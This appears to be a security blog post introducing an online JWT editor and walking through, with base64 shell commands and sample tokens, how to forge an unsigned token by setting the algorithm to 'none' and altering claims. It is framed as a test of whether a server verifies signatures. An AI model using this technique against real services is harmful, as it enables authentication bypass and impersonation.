Edit JWT Online (setting algorithm to none)
Online editor for a JWT token to use the "none" algorithm. Edit the header and the payload, get the encoded output.
One of the tests to ensure a JSON Web Token (JWT) is implemented securely is to try to alter the algorithm used to sign it. The signature confirms it hasn't been modified by an attacker. If the algorithm is "none" then when the signature is checked, it might just be ignored completely. This means we can edit the content of the JWT and have it accepted, bypassing this important security feature.
Paste an encoded JWT below to edit it. The altered version appears in the last text box.
How to do this in Linux (if you don't have access to this page):
Start with the encoded token:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
Split the encoded token into segments delimited by the "." character.
The first block is the header, decode that:
echo 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9' | base64 -d
Here, the result is:
{"alg":"HS256","typ":"JWT"}
You can manually edit this and alter the algorithm, here we're changing it to "none". Once changed we can base64 encode it again to become useable:
echo -n '{"alg":"none","typ":"JWT"}' | base64
The result of that is :
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=
IMPORTANT: Remove the trailing "=" before we use it to replace the first part of the JWT.
Follow the same process to edit the JWT payload (second encoded block).
echo 'eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ' | base64 -d
Result:
{"sub":"1234567890","name":"John Doe","iat":1516239022}
We'll edit the name from John Doe to be Jane Doe and encode it:
echo -n '{"sub":"1234567890","name":"Jane Doe","iat":1516239022}' | base64
Result:
eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkphbmUgRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ==
If we're setting the algorithm to "none" then we don't want a signature. The format we'll get is:
{encoded header}.{encoded payload}.
Note the "." on the end. This would normally have the signature after it but because we're saying the algorithm is none then no signature is needed.
Our example becomes:
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkphbmUgRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.
We've successfully edited a JWT and can test to see if the server accepts the edited version.
Got a comment or correction (I’m not perfect) for this post? Please leave a comment below.
Subscribe to Gavin Johnson-Lynn
Get the latest posts delivered right to your inbox